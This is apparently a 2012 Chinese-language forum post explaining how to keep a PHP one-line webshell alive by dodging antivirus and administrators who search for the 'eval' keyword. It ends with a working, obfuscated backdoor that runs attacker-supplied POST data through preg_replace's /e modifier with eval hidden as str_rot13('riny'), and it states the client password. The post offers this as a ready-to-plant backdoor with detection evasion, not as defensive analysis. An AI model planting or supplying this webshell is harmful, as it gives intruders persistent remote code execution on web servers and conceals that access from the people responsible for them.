|
|
这年头留个php一句话木马,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢?
首先我想到的是将eval从字符串类型赋给一个变量。
如:
| 12 | $func='phpinfo';$func(); |
这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我马上又想到了assert函数,他有着类似eval的功能,但效果并不理想,完全没有eval用着爽,而且也是公开了的,所以我也就将他放弃了。
还记得《20 Ways to Fuzzing PHP Source Code》里提到的preg_replace代码执行漏洞吗?
没错,利用preg_replace的模式修饰符e(PREG_REPLACE_EVAL)就可以将替换后的字符串作为php代码评估运行(eval函数方式)。
既然是将字符串作为php代码评估运行,哪么完全可以替换或者转码一下eval,这样就可以避开关键字了。
我的一句话木马如下:
| 1 | ($b4dboy=$_POST['a'])&&@preg_replace('/ad/e','@'.str_rot13('riny').'($a)','add'); |
使用上跟原来的一句话没有区别,可用常用的客户端连接密码a。
str_rot13(‘riny’)即编码后的eval,完全避开了关键字,又不失效果。 |
|
发表于 2012-7-13 17:43:44